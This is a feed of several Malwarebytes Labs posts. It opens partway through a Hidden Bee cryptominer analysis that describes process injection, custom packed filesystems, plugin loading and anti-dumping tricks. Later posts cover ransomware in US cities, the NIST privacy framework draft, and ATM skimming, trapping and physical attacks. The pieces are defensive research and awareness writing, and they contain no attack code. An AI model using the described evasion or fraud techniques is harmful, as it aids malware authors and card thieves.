Depending on which process the coredll was injected into, it can take one of a few paths of execution.

If it is running for the first time, it will try to inject itself again—this time into rundll32. For the purpose of the injection, it will again unpack the original !rbx package and use its original copy stored there.

Entering the unpacking function Inside the unpacking function: checking the magic “!rbx”

Then it will choose the modules depending on the bitness of the rundll32:

It selects the pair of modules (preload/coredll.bin) appropriate for the architecture, either from the directory amd64 or from i386:

If the injection failed, it makes another attempt, this time trying to inject into dllhost:

Each time it uses the same, hardcoded parameter (/Processid: {...}) that is passed to the created process:

The thread context of the target process is modified, and then the thread is resumed, running the injected content:

Now, when we look inside the memory of rundll32, we can find the preload and coredll being mapped:

Inside the injected part, the execution follows a similar path: preload loads the coredll and redirects to its Entry Point. But then, another path of execution is taken.

The parameter passed to the coredll decides which round of execution it is. On the second round, another injection is made: this time to dllhost.exe. And finally, it proceeds to the final round, when other modules are unpacked from the BABECAFE filesystem.

Parameter deciding which path to take

The unpacking function first searches by name for two more modules: sputnik.spk and plugins.spk. They are both in the mysterious !rsi format, which reminds us of !rbx, but has a slightly different structure.

Entering the function unpacking the first !rsi package:

The function unpacking the !rsi format is structured similarly to the !rbx unpacking. It also starts from checking the keyword:

Checking “!rsi” keyword

As mentioned before, both !rsi packages are used to store filesystems marked with the keyword “SPUTNIK”. It is another custom filesystem invented by the Hidden Bee authors that contain additional modules.

The “SPUTNIK” keyword is checked after the module is unpacked

Unpacking the sputnik.spk resulted in getting the following SPUTNIK module: 455738924b7665e1c15e30cf73c9c377

It is worth noting that the unpacked filesystem has inside of it four executables: two pairs consisting of NS and PE, appropriately 32 and 64 bit. In the currently-analyzed setup, 32 bit versions are deployed.

The NS module will be the next to be run. First, it is loaded by the current executable, and then the execution is redirected there. Interestingly, both !rsi modules are passed as arguments to the entry point of the new module. (They will be used later to retrieve more components.)

Calling the newly-loaded NS executable Sixth stage: mpsi.dll (unpacked from SPUTNIK)

Entering into the NS module starts another layer of the malware:

Entry Point of the NS module: the !rsi modules, perpended with their size, are passed

The analyzed module, converted to PE is available here: 537523ee256824e371d0bc16298b3849

This module is responsible for loading plugins. It will also create a named pipe through which it is will communicate with other modules. It sets up the commands that are going to be executed on demand.

This is how the beginning of the main function looks:

Like in previous cases, it starts from finishing to load itself (relocations and imports). Then, it patches the function in NTDLL. This is a common prolog in many HiddenBee modules.

Then, we have another phase of loading elements from the supplied packages. The path that will be taken depends on the runtime arguments. If the function received both !rsi packages, it will start by parsing one of them, retrieving loading submodules.

First, the SPUTNIK filesystem must be unpacked from the !rsi package:

After being unpacked, it is mounted. The filesystems are mounted internally in the memory: A global structure is filled with pointers to appropriate elements of the filesystem.

At the beginning, we can see the list of the plugins that are going to be loaded: cloudcompute.api, deepfreeze.api, and netscan.api. Those names are being appended to the root path of the modules.

Each module is fetched from the mounted filesystem and loaded:

Calling the function to load the plugin

Consecutive modules are loaded one after another in the same executable memory area. After the module is loaded, its header is erased. It is a common technique used in order to make dumping of the payload from the memory more difficult.

The cloudcompute.api is a plugin that will load the miner. More about the plugins will be explained in the next section of this post.

Reading its code, we find out that the SPUTNIK modules are filesystems that can be mounted and dismounted on demand. This module will be communicating with others with the help of a named pipe. It will be receiving commands and executing appropriate handlers.

Initialization of the commands’ parser:

The function setting up the commands: For each name, a handler is registered. (This is probably the Lua dispatcher, first described here.)

When plugins are run, we can see some additional child processes created by the process running the coredll (in the analyzed case it is inside rundll32):

Also it triggers a firewall alert, which means the malware requested to open some ports (triggered by netscan.api plugin):

We can see that it started listening on one TCP and one UDP port:

The plugins

As mentioned in the previous section, the SPUTNIK filesystem contains three plugins: cloudcompute.api, deepfreeze.api, and netscan.api. If we convert them to PE, we can see that all of them import an unknown DLL: mpsi.dll. When we see the filled import table, we find out that the addresses have been filled redirecting to the functions from the previous NS module:

So we can conclude that the previous element is the mpsi.dll. Although its export table has been destroyed, the functions are fetched by the custom loader and filled in the import tables of the loaded plugins.

First the cloudcompute.api is run.

This plugin retrieves from the filesystem a file named “/etc/ccmain.json” that contains the list of URLs:

Those are addresses from which another set of modules is going to be downloaded:


It also retrieves another component from the SPUTNIK filesystem: /bin/i386/ccmain.bin. This time, it is an executable in NE format (version converted to PE is available here: 367db629beedf528adaa021bdb7c12de)

This is the component that is injected into msdtc.exe.

The HiddenBee module mapped into msdtc.exe

The configuration is also copied into the remote process and is used to retrieve an additional package from the C&C:

This is the plugin responsible for downloading and deploying the Mellifera Miner: core component of the Hidden Bee.

Next, the netscan.api loads module /bin/i386/kernelbase.bin (converted to PE: d7516ad354a3be2299759cd21e161a04)

The miner in APT-style

Hidden Bee is an eclectic malware. Although it is a commodity malware used for cryptocurrency mining, its design reminds us of espionage platforms used by APTs. Going through all its components is exhausting, but also fascinating. The authors are highly professional, not only as individuals but also as a team, because the design is consistent in all its complexity.

Appendix – helper tools for parsing and converting Hidden Bee custom formats

Articles about the previous version (in Chinese):

Our first encounter with the Hidden Bee:

The post Hidden Bee: Let’s go down the rabbit hole appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Ransomware isn’t just a big city problem

Malwarebytes - Fri, 05/31/2019 - 15:00

This month, one ransomware story has been making a lot of waves: the attack on Baltimore city networks. This attack has been receiving more press than normal, which could be due to the actions taken (or not taken) by the city government, as well as rumors about the ransomware infection mechanism.

Regardless, the Baltimore story inspired us to investigate other cities in the United States, identifying which have had the most detections of ransomware this year. While we did pinpoint numerous cities whose organizations had serious ransomware problems, Baltimore, nor any of the other high-profile city attacks, such as Atlanta or Greenville, was not one of them. This follows a trend of increasing ransomware infections on organizational networks that we’ve been watching for a while now.

To curb this, we are providing our readers with a guide on how to not only avoid being hit with ransomware, but deal with the ransomware fallout. Basically, this is a guide on how not to be the next Baltimore. While many of these attacks are targeted, cybercriminals are opportunistic—if they see an organization has vulnerabilities, they will swoop in and do as much damage as they can. And ransomware is about as damaging as it gets.

Baltimore ransomware attack

As of presstime, Baltimore city servers are still down. The original attack occurred on May 7, 2019, and as soon as it happened, the city shut down numerous servers on their networks to keep them secure from the possible spread of the ransomware.

The ransomware that infected Baltimore is called RobinHood, or sometimes RobinHood ransomware. When a ransom note was discovered, it demanded a payment of $100,000 or about 13 Bitcoins. Much like other ransomware, it came with a timer, demanding that the victims pay up by a certain date, or the cost of recovering files would go up by $10,000 a day.

RobinHood ransom note, Courtesy Lawrence Abrams & Bleeping Computer

RobinHood ransomware is a newer malware family but has already made a name for itself infecting other city networks, as it did for the City of Greenville. According to a report from the New York Times, some malware researchers have claimed that the NSA-leaked exploit EternalBlue is involved in the infection process, however analysis by Vitali Kremez at Sentinel One does not show any sign of EternalBlue activity. Rather, the method of spreading the ransomware from system to system involves manipulation of the PsExec tool.

This is not the first cyberattack Baltimore has dealt with recently. In fact, last year their 911 dispatch systems were compromised by attackers, leaving the dispatchers using pen and paper to conduct their work. Some outlets have blamed the city’s historically inefficient network design on previous Chief Information Officers (CIOs), of which there have been many. Two of its CIOs resigned in this decade alone amidst allegations of fraud and ethical violations.


Baltimore aside, ransomware aimed at organizations has been active in the United States over the course of the last six months, with periodic spurts and massive spikes that represent a new approach to corporate infection by cybercriminals.

The below heat map shows a compounding effect of ransomware detections in organizations across the country from the beginning of 2019 to now.

A heat map of ransomware detections in organizations from January 2019 to present day

Primary areas of heavy detection include regions around larger cities, for example, Los Angeles and New York, but we also see heavy detections in less populated areas as well. The below diagram further illustrates this trend: Color depth represents the overall detection amount for the state, while the size of the red circles represents the number of detections for various cities. The deeper the color, the more detections the state contains. The larger the circle, the higher number of detections in the city.

US map of overall state and city detections of organization-focused ransomware in 2019

When we take an even deeper look and identify the top 10 cities in 2019 (so far) with heavy ransomware detections, we see that none of them include cities we’ve read about in the news recently. This trend supports the theory that it doesn’t require being surrounded by victims of ransomware to become one.

Wherever ransomware decides to show up, it is going take advantage of weak infrastructure, configuration issues, and ignorant users to break into the network. Ransomware is becoming a more common weapon to lodge against businesses than it was in years past. The below chart expresses the massive spike of ransomware detections we saw earlier in the year.

January and February are shining examples of the kind of heavy push we saw from families like Troldesh earlier in the year. However, while it seems like ransomware is dying off after March, we think more of it as the criminals taking a breather. When we dig into weekly trends, we can see specific spikes that were due to heavy detections of specific ransomware families.

Unlike what we’ve observed in the past with consumer-focused ransomware, where a wide net was cast and we observed a near constant flood of detections, ransomware focused on the corporate world attacks in short pulses. These may be due to certain time frames being best for attacking organizations, or it could be the time required to plan an attack against corporate users, which calls for the collection of corporate emails and contact info before launching.

Regardless, ransomware activity in 2019 has already hit a record number, and while we have only seen a few spikes in the last couple of months, you can consider these road bumps between two big walls. We just haven’t hit the second wall yet.


Despite an increase in ransomware targeting organizational networks, city networks that have been impacted by ransomware do not show up on our list of top infected cities. This leads us to believe that ransomware attacks on city infrastructure, like what we are seeing in Baltimore, do not occur because of widespread outbreaks, but rather are targeted and opportunistic.

In fact, most of these attacks are due to vulnerabilities, gaps in operational security, and overall weak infrastructure discovered and exploited by cybercriminals. They often gain a foothold into the organization through ensnaring employees in phishing campaigns and infecting endpoints or having enough confidence to launch a spear phishing campaign against high-profile targets in the organization.

Real spear phishing email (Courtesy of Lehigh University

There is also always a case to be made about misconfigurations, slow updating or patching, and even insider threats being the cause of some of these attacks. Security researchers and city officials still do not have a concrete answer for how RobinHood infected Baltimore systems in the first place.


There are multiple answers to the question, “How do I beat ransomware?” and unfortunately, none of them apply 100 percent of the time.  Cybercriminals spent the better part of 2018 experimenting on novel methods of breaking through defenses with ransomware, and it looks like they’re putting those experimentations to the test in 2019. Even if organizations follow “all the rules,” there are always new opportunities for infection. However, there are ways to get ahead of the game and avoid worst-case scenarios. Here are four areas that need to be considered when trying to plan for ransomware attacks:


While we did say that EternalBlue likely did not play a part in the spread of RobinHood ransomware, it has been used by other ransomware and malware families in the past. To this end, patching systems is becoming more and more important every day, because developers aren’t just fixing usability bugs or adding new features, but filling holes that can be exploited by the bad guys.

While patching quickly is not always possible on an enterprise network, identifying which patches are required to avoid a potential disaster and deploying those within a limited scope (as in, to systems that are most vulnerable or contain highly-prioritized data) is necessary. In most cases, inventorying and auditing patches should be completed, regardless if the patch can be rolled out across the org or not.


For the last seven or so years, many software developers, including those of operating systems, have created tools to help fight cybercrime within their own products. These tools are often not offered as an update to existing software, but are included in upgraded versions. Windows 10, for example, has anti-malware capabilities built into the operating system, making it a more difficult target for cybercriminals than Windows XP or Windows 7. Look to see which software and systems are nearing end-of-life in their development cycle. If they’ve been phased out of support by an organization, then it’s a good idea to look to upgrading software altogether.

In addition to operating systems, it’s important to at least consider and test an upgrade of other resources on the network. This includes various enterprise-grade tools, such as collaboration and communication platforms, cloud services, and in some cases hardware.


Today, email attacks are the most common method of spreading malware, using either widespread phishing attacks that dupe whomever they can, or specially-crafted spear phishing attacks, where a particular target is fooled.

Therefore, there are three areas that organizations can focus on when it comes to avoiding ransomware infections, or any malware for that matter. This includes email protection tools, user education and security awareness training, and post email execution blocking.

There are numerous tools that provide additional security and potential threat identification for email servers. These tools reduce the amount of potential attack emails your employees will receive, however, they may slow down email sending and receiving due to checking all the mail coming in and out of a network.

User education, however, involves teaching your users what a phishing attack looks like. Employees should be able to identify a threat based on appearance rather than functionality and, at the least, know what to do if they encounter such an email. Instruct users to forward shady emails to the in-house security or IT teams to investigate the threat further.

Finally, using endpoint security software will block many attempts at infection via email, even if the user ends up opening a malicious attachment. The most effective endpoint solution should include technology that blocks exploits and malicious scripts, as well as real-time protection against malicious websites. While some ransomware families have decryptors available that help organizations retrieve their files, remediation of successful ransomware attacks rarely returns lost data.

Following the tips above will provide a better layer of defense against the primary methods of infection today, and can empower your organization to repel cyberattacks beyond ransomware.


Being able to avoid infection in the first place is obviously preferable for organizations, however, as mentioned before, many threat actors develop novel attack vectors to penetrate enterprise defenses. This means that you need to not only establish protection to prevent a breach, but ready your environment for an infection that will get through.

Preparing your organization for a ransomware attack shouldn’t be treated as an “if” but a “when” if you expect it to be useful.

To that end, here are four steps for making your organization ready for “when” you experience a ransomware attack.

Step 1: Identify valuable data

Many organizations segment their data access based on required need. This is called compartmentalization, and means that no single entity within the organization can access all data.  To that end, you need to compartmentalize your data and how it’s stored in the same spirit. The point of doing this is to keep your most valuable (and biggest problem if lost) data segmented from systems, databases, or users who don’t need to access this data on a regular basis, making it more difficult for criminals to steal or modify said data.

Customers’ personally identifiable information, intellectual property, and financial information are three types of data that should be identified and segmented from the rest of your network. What does Larry, the intern, need access to customer data for? Why is the secret formula for the product you sell on the same server as employee birthdays?

Step 2: Segment that data

If needed, you should roll out additional servers or databases that you can put behind additional layers of security, be it another firewall, multi-factor authentication, or just limiting how many users can have access. This is where the data identified in the previous step is going to live. 

Depending on your operational needs, some of this data might need to be accessed more than others and, in that case, you’ve got to set up your security to account for it, otherwise you might hurt operational efficiency beyond the point where the risk is worth the reward.

Some general tips on segmenting data:

  • Keep the system with this data far away from the open Internet
  • Require additional login requirements, like a VPN or multi-factor authentication to access the data
  • There should be a list of systems and which users have access to data on which systems. If a system is somehow breached, there is where you start.
  • If you have the time and resources, roll out a server that barely has protection, add data that looks legitimate but, in reality, is actually bogus, and ensure that it’s vulnerable and easy to identify by an attacker. In some cases, criminals will take the low-hanging fruit and leave, ensuring your actual valuable data remains untouched.       
Step 3: Data backup

Now your data has been segmented based on how important it is, and it’s sitting behind a greater layer of security than before. The next step is to once again identify and prioritize important data to determine how much of it can be backed up (hopefully all the important data, if not all the company data).  There are some things to consider when deciding on which tools to use to establish a secure backup:

  • Does this data need to be frequently updated?
  • Does this data need to remain in my physical security?
  • How quickly do I need to be able to back up my data?
  • How easy should it be to access my backups?

When you can answer these questions, you’ll be able to determine which type of long-term storage solution you need. There are three options: online, local, and offsite.


Using an online backup solution is likely going to be the fastest and easiest for your employees and/or IT staff. You can access from anywhere, use multi-factor authentication, and rest easy knowing it’s secured by people who secure data for a living. Backing up can be quick and painless with this method, however the data is outside of the organization’s physical control and if the backup service is breached, that might compromise your data.

Overall, online backup solutions are likely going to be the best option for most organizations, because of how easy they are to set up and utilize.


Perhaps your organization requires local storage backups. This process can range from incredibly annoying and difficult to super easy and insecure.

Local storage allows you to store offline, yet onsite, maintaining a physical security presence. However, you are limited by your staff, resources, and space on how you can establish a backup operation locally. In addition, operational data that needs to be used daily may not be a candidate for this type of backup method.


Our last option is storing data on removable hard drives or tapes and then having them stored in an offsite location. This might be preferable if data is especially sensitive and needs to be kept away from the location at which it was created or used. Offsite storage will ensure that your data is safe if the building explodes or is raided, but the process can be slow and tedious. You also are unlikely to use this method for operational data that requires regular access and backups.

Offsite backups are only needed in cases of storing extremely sensitive information, such as government secrets, or if the data needs to be maintained and kept for records, but regular access isn’t required.                                              

Step 4: Create an isolation plan

Our last step in preparing your organization for a ransomware attack is to know exactly how you will isolate an infected system. The speed and method in which you do this could save the entire organization’s data from an actively-spreading ransomware infection.

A good isolation plan takes into consideration as many factors as possible:

  • Which systems can be isolated quickly, and which need more time (e.g, endpoints vs. servers)?
  • Can you isolate the system locally or remotely?
  • Do you have physical access?
  • How quickly can you isolate systems connected to the infected one?

Ask yourself these questions about every system in your network. If the answer to how quickly you can isolate a system is “not fast enough,” then it’s time to consider reconfiguring your network to speed up the process.

Luckily, there are tools that provide network administrators with the ability to remotely isolate a system once an infection is detected. Investing time and resources into ensuring you have an effective plan for protecting the other systems on your network is paramount with the type of threats we see today.

Ransomware resilience

As we’ve covered, there has been a bumpy increase in organization-focused ransomware in 2019 and we expect to see more spikes in the months to come, but not necessarily in the cities you might expect. The reality is that the big headline cities hit with ransomware make up only a few of the hundreds of ransomware attacks that occur every single day against organizations across the country.

Cybercriminals will not obey the rules for how to conduct attacks. In fact, they are constantly looking for new opportunities, especially in places security teams are not actively covering. Therefore, spending all your resources on avoidance measures is going to leave your organization in a bad place. 

Taking the time to establish a plan for when you do get attacked, and building your networks, policies, and culture around that concept of resilience will prevent your organization from becoming another headline.

The post Ransomware isn’t just a big city problem appeared first on Malwarebytes Labs.

Categories: Techie Feeds

NIST’s privacy framework lets privacy tell its own story

Malwarebytes - Wed, 05/29/2019 - 18:51

Online privacy remains unsolved. Congress prods at it, some companies fumble with it (while a small handful excel), and the public demands it. But one government agency is trying to bring everyone together to fix it.

As the Senate sits on no fewer than four data privacy bills that their own members wrote—with no plans to vote on any—and as the world’s largest social media company braces for an anticipated multibillion-dollar privacy blunder, the US National Institute of Standards and Technology (NIST) has published what it calls a “privacy framework” draft.

Non-binding, unenforceable, and entirely voluntary to adopt, the NIST privacy framework draft serves mainly as a roadmap. Any and all companies, organizations, startups, and agencies can look to it for advice in managing the privacy risks of their users.

The framework draft offers dozens of actions that a company can take on to investigate, mitigate, and communicate its privacy risks, both to users and executives within the company. Nearly no operational idea is left unturned.

Have a series of third-party vendors in a large supply chain? The NIST framework has a couple of ideas on how to secure that. What about countless employees with just as many logins and passwords? The framework considers that, too. Ever pondered the enormous meaning of “data security” for your company? The NIST framework has a couple of entry points for how to protect data at rest and in transit.

Though wrought in government-speak and at times indecipherable nomenclature (suggested company actions are called “subcategories”), the 37-page privacy framework, according to one of its authors, has a simple and equally elegant purpose: It could finally let privacy tell its own story.

“To date, security [professionals] are telling a dramatic story. ‘We had these threats. Look what happened to these companies here,’” said NIST Senior Privacy Policy Advisor Naomi Lefkovitz. “But privacy [professionals] are over here saying ‘Privacy is a very important value,’ which is true, but it’s not quite as compelling when resources are being allocated.”

Lefkovitz continued: “We want privacy to be able to tell an equally compelling story.”

If successful, the NIST privacy framework could improve user privacy within organizations across the United States. It could better equip privacy officers to convince their companies to bulk up internal controls. And it could create an agreed-upon direction for privacy.

There are, of course, obstacles. A voluntary framework is only as successful as it is attractive—overly ambitious guidelines could turn the framework into a dud, tossed aside by the companies that handle the most user data.

Also, the framework should work in coordination with current data protection laws, rather than trying to overwrite those laws’ requirements. For example, as companies have built up their internal controls to comply with the European Union’s sweeping data protection law, the General Data Protection Regulation, a new approach to privacy could be seen as time-consuming, costly, and unnecessary.

Despite the potential roadblocks, NIST has been here before. Six years ago, the government agency was tasked with making a separate framework—one for cybersecurity.

The NIST cybersecurity framework

In 2013, through Executive Order 13636, President Barack Obama asked NIST to develop a strategy on securing the nation’s critical infrastructure from cyberattacks. This strategy, or framework, would include “standards, methodologies, procedures, and processes that align policy, business, and technological approaches to address cyber risks.” It would be voluntary, flexible, repeatable, and cost-effective for organizations to take on.

On February 12, 2014, NIST published the first version of its cybersecurity framework. The framework’s so-called “core” includes five functions that a company can take on to manage cybersecurity risks. Those functions are:

  • Identify
  • Protect
  • Detect
  • Respond
  • Recover

Each function includes “categories” and “subcategories,” the latter of which are actually outcomes that a company can try to achieve. It may sound confusing, but the framework simply organizes potential cybersecurity goals based on their purpose, whether that means identifying cybersecurity risks, protecting against those risks, detecting problems when they arise, or responding and recovering from them later on.

Several years, multiple workshops, more than 120 submitted comments, and one major update later, the framework has proved largely popular.

According to annual surveys of cybersecurity professionals by the Information Systems Security Association and Enterprise Strategy Group, the NIST cybersecurity framework has taken hold. In 2018, 46 percent of the survey’s 267 respondents said that they had “adopted some portions or all of the NIST cybersecurity framework” in the past two years. That same response showed up as a top five cybersecurity measure in 2017 and 2016.

In April 2018, when NIST released the cybersecurity framework’s Version 1.1 update, the US Chamber of Commerce, the Business Roundtable, and the Information Technology Industry Council all spoke in favor, with the Chamber of Commerce calling the framework “a pillar for managing enterprise cyber risks and threats.”

For NIST, the challenge will be translating these successes to privacy.

“Privacy is, if anything, more contextual than security, and therefore, it makes it very difficult to make one-size-fits-all rules and expect to get effective privacy solutions,” said Lefkovitz. “You can certainly get a checklist of solutions, but that doesn’t mean you’re providing any privacy benefits.”

The NIST privacy framework

The NIST privacy framework draft, published last month after a 48-day open comment period, is modeled closely to NIST’s cybersecurity framework. The privacy framework, just like the cybersecurity framework, has a core that includes five functions, each with its own categories and subcategories, the latter of which, again, actually describe outcomes. The privacy framework’s five core functions are:

  • Identify
  • Protect
  • Control
  • Inform
  • Respond

Again, companies can voluntarily use the framework as a tool, choosing the areas of privacy risk management where they need support.

For example, a company that wants to identify the privacy risks to its users can explore its inventory and mapping processes, supply chain risk management, and governance, which covers a company’s policies and regulatory and legal requirements. A company that wants to protect against privacy risks can look at achieving a number of options, including insuring that both remote access and physical access to data and devices are managed. Companies could also, for example, make sure that data is destroyed according to company policy.

The privacy framework has been well received, but there are improvements to be made.

“I think the draft is good as a starting point,” said Amie Stepanovich, US policy manager for Access Now, a digital rights and free expression advocacy group that submitted comments to NIST about the privacy framework. “It is a draft, though.”

Stepanovich said she liked that the privacy framework draft will be revisited in the future, and that it does not try to present a “one-size-fits-all” solution to privacy. She also said that she hopes the privacy framework can dovetail with current data protection laws, and not serve as a replacement to much-needed data privacy legislation.

Stepanovich added that the privacy framework’s focus on the user represents a potentially enormous shift for privacy risk management for many companies. Currently, Stepanovich said, privacy risk operates on three levers—legal liability risks, public relations risks, and future regulatory risks. Basically, companies calculate their privacy risk based on whether they’ll face a lawsuit, look bad in the newspaper, or look so bad in front of Congress that an entirely new law is crafted to rein them in.

The focus on the user, Stepanovich said, could meaningfully communicate to the public that their data is being protected in an all new way.

“The trust that people can have in companies—or data processors—will not come from legal compliance, because nobody says ‘Trust me, I do exactly what I have to do to not be sued,’” Stepanovich said. “If [data processors] are going beyond what needs to be done to serve interests of people who may be put at risk through their behavior, that starts to look like something people will pay attention to.”

But going above and beyond the current legal compliance landscape could actually be a roadblock for some companies.

When NIST opened its email box up for public comments, one major lobbying group suggested a list of “minimum attributes” to be included. The Internet Association, which represents the public policy interests of Google, Facebook, Uber, Airbnb, Amazon, and Twitter, just to name a few, asked that the framework have “compatibility with other privacy approaches.”

For many of the group’s represented companies, legal compliance is part of their privacy approach, and NIST’s privacy framework draft proposes a few outcomes that do not entirely line up with current legal requirements in the US.

For example, the privacy framework suggests that companies could structure their data management to “protect individuals’ privacy and increase manageability.” Some of the ways to do that, the privacy framework suggests, are by giving users the control to access, alter, and delete the data stored about them.

But a company that adheres to those suggestions could potentially face questions about how to fulfill certain government requests in which US intelligence agencies demand a user’s online messages or activity as part of an investigation.

Another “minimum attribute” proposed by the Internet Association is also missing from the draft: “Common and Accessible Language.”

A similar matter proved a pain point for Stepanovich, who is not associated with the Internet Association.

“This is not a draft document that people can easily understand,” Stepanovich said. She compared the privacy framework draft to, somewhat surprisingly, the hit ABC drama “Lost,” a circuitous six-season television show that included a disappearing island, time travel, and storytelling techniques such as flashbacks, flash-forwards and, remarkably, what can only be described as “flash-sideways” moments into a parallel, maybe-Heaven dimension.

“This is the ‘Lost’ problem,” Stepanovich said. “’Lost’ lost viewers every season because you couldn’t start watching it in season three and have any clue—it required watching every episode, and it kept getting more complicated, providing no entry point.”

TV analogies aside, Stepanovich’s bigger point is this: With no entry point for non-techies, the individuals who could be most impacted by this privacy framework will miss out on the opportunity to shape it.

“It shouldn’t just be cybersecurity, those who focus on tech, because tech is not necessarily the most at-risk community here. LGBT [individuals], civil rights [defenders], immigrants—populations who have a higher stake in the privacy conversation,” Stepanovich said. “If it is too difficult for us to understand, it is impossible for those groups to get in there and have the resources to devote to this issue. They need to be there.”

Beyond the draft

NIST’s privacy framework draft is just that, a draft. The agency scheduled a webinar for May 28 and a public workshop in Boise, Idaho, on July 8 and 9. Registration is free. A preliminary draft is expected in the summer, with Version 1.0 to be published in October.

Until then, everyone is invited to share their thoughts with NIST about what they expect to see from the privacy framework. We at Malwarebytes know you care about privacy—you’ve told us before. Feel free to tell your story about privacy. It could help shape the topic’s future.

The post NIST’s privacy framework lets privacy tell its own story appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Everything you need to know about ATM attacks and fraud: Part 1

Malwarebytes - Wed, 05/29/2019 - 15:00

Flashback to two years ago. At exactly 12:33 a.m., a solitary ATM somewhere in Taichung City, Taiwan, spewed out 90,000 TWD (New Taiwan Dollar)—about US$2,900 today—in bank notes.

No one was cashing out money from the ATM at the time. In fact, this seemingly odd system glitch was actually a test: The culprit who successfully infiltrated one of First Commercial Bank’s London branch servers issued an instruction to a cashpoint 7,000 miles away to check if a remote-controlled heist was possible.

Within 15 hours, 41 more ATM machines in other branches in Taichung and Taipei cities doled out an accumulated 83.27 million TWD, which is worth US$2.7 million today.

And while the Taiwan police were able to successfully nab the suspects of this million-dollar heist—most of whom hailed from European countries—many unnamed criminals taking advantage of flaws and weaknesses in ATM machines (even financial systems as a whole) are still at large.

Normal ATM users cannot fight against such an attack on their banks. But with vigilance, they can help bring criminals to justice. The catalyst for the successful capture of the heisters was intel provided by citizens who, after noticing the foreign nationals acting suspiciously and gathering relevant information—in this case, a car license plate number, and a credit card one of the suspects accidentally left behind—reported it to law enforcement.

Why ATMs are vulnerable

Just like any computing device, ATMs have vulnerabilities. And one way to understand why bad guys are drawn to them is to understand its components and the way it communicates with the bank network.

An ATM is composed of a computer (and its peripherals) and a safe. The former is enclosed in a cabinet. This is the same whether the ATM is a stand-alone kiosk or a “hole in the wall.” The cabinet itself isn’t particularly secure or sturdy, which is why criminals can use simple tools and a lock key purchasable online to break into it to gain access either to the computer or the safe.

The computer usually runs on Windows—a version specifically created for ATMs. ATM users don’t see the familiar Windows desktop interface because access is restricted. What we do see are user-facing applications that aid us in making transactions with the machine.

A rough list of attacks on ATMs (Source: Positive Technologies)

Up to now, many ATMs have still been running on Windows XP. If the OS is outdated, expect that the software in them may need some upgrading as well. That said, criminals can take their pick of which exploits to use to make the most of software vulnerabilities and take control of the remote system.

In some cases, interfaces like a USB port visible in public can encourage users with ill-intent to introduce malware to the machine via portable device. Since security software may not be installed in them, and there is a significant absence of authentication between peripherals and the OS, there is increased likelihood of infection. To date, there are already 20 strains of known ATM malware discovered.

The cash dispenser is directly attached to the safe where the cash is stored. A compromised computer can easily give criminals access to the interface between the computer and the safe to command it to dispense cash without using stolen customer card information.

The traffic between the ATM computer and the transaction processing server is usually not encrypted, making it a breeze for hackers to intercept transmitted data from customer to bank server. Worse, ATMs are notoriously known for implementing poor firewall protection, which makes them susceptible to network attacks.

Other notable weaknesses are missing or misconfigured Application Control software, lack of hard drive encryption, and little-to-no protection against users accessing the Windows interface and introducing other hardware devices to the ATM.

Types of ATM attacks and scams

Hacking a bank’s server is only one of the many known ways criminals can get their hands on account holders’ card details and their hard-earned cash. Some methods are clever and tactical. Some can be crude. And others are more destructive and dangerous. Whatever the cost, we can bet that criminals will do whatever it takes to pull off a successful heist.

We have highlighted types of ATM attacks here based on their classification: terminal tampering, physical attacks, logical attacks, and social engineering.

For this post, we’ll be delving deep into the first two. (The second two attacks will be featured in Part 2 of this series.)

Terminal tampering

The majority of ATM fraud campaigns involve a level of physically manipulating parts of the machine or introducing devices to it to make the scheme work.

Skimming. This is a type of fraud where a skimming device, usually a tandem of a card reader (skimmer) and keypad overlay or pinhole camera, is introduced to the machine by placing it over the card slot and keypad, respectively. The more closely it resembles that of the machine’s, the better it’ll work (and less likely to draw suspicion).

The purpose of the second reader is to copy data from the card’s magnetic stripe and PIN so the criminal can make forgeries of the card.

ATM skimmer devices (Source: The Hacker News)

Of course, there are many ways to capture card and PIN data surreptitiously. They all fall under this scheme. Examples include skimming devices that tap into the ATM’s network cables, which can intercept data in transit.

Criminals can up the ante of their skimming campaign by purchasing a second-hand ATM (at a bargain price) and then rigging it to record data. These do not dispense cash. This, by far, is the most convincing method because wary account holders wouldn’t think that an entire ATM is fake. Unfortunately, no amount of card slot jiggling can save their card details from this.

Skimming devices can also be slotted at point-of-sale (POS) terminals in shops or inside gas pumps. Some skimmers are small enough to be concealed in one’s hand so that, if someone with ill intent is handed a payment card, they can quickly swipe it with their skimmer after swiping it at a POS terminal. This is a video of a former McDonald’s employee manning the drive-thru window caught doing just that.

Shimming. One may refer to shimming as an upgraded form of skimming. While it still targets cards, its focus is recording or stealing sensitive data from their embedded chips.

A paper-thin shimming device is inserted in the ATM’s card slot, where it sits between the card and the ATM’s chip reader. This way, the shimmer records data from the card chip while the machine’s chip reader is reading it. Unlike earlier skimming devices, shimmers can be virtually invisible if inserted perfectly, making them difficult to detect. However, one sign that an ATM could have a shimming device installed is a tight slot when you insert your bank card.

Data stolen from chip cards (also known as EMV cards) can be converted to magnetic stripe data, which in turn can be used to create fake-out versions of our traditional magnetic stripe cards.

If you may recall, issuers once said that EMV cards offer better protection against fraud compared to traditional bank cards.

With more users and merchants now favoring chip cards, either due to convenience or industry compliance, it was expected that criminals would eventually find a way to circumvent the chip’s security and read data from it. Regrettably, they didn’t disappoint.

Card trapping. Although not as broadly reported as other ATM attack schemes, card trapping is alive and, unfortunately, kicking. Of late, this has victimized a 17-year old who lost her life savings and a friend of a former detective from Dundee, Scotland.

Card trapping is a method wherein criminals physically capture their target’s debit or credit card via an ATM. They do this by introducing a device, usually a Lebanese loop, that prevents the card from getting ejected once a transaction is completed. Criminals steal their target’s PIN by shoulder surfing or by using a small hidden camera similar to those used in skimming.

A card trap (Source: Police Service of Northern Ireland)

Another known card trap is called a spring trap.

Cash trapping. This is like card trapping, only criminals are after the cash their target just withdrew. A tool—either a claw-like tool, a huge fork-like device that keeps the cash slot open after an ATM withdrawal, or a “glue trap”—is introduced to the ATM cash slot to trap at least some of the cash or most all of it.

Cash trapping that doesn’t involve pincer implements normally use what is called a false ATM presenter. This is a fake ATM cash dispenser placed in front of the real one.

A false ATM presenter used to capture cash (Source: ENISA) Physical attacks

If wit isn’t enough to pull off a successful ATM heist, brute force might. As rough, unsophisticated, and sloppy as they look, criminals have achieved some success going this route.

Crooks who’d rather be loud than quiet in their activities have opted to using explosives—solid and gas, alike—chain lassoing the machine to be uprooted and dragged away, ram-raiding, and using a digger to dig a wall-mounted ATM out of a building. A sledgehammer, crowbar, and hammer have worked wonders, too.

This ATM theft took less than four minutes (Source: The Guardian)

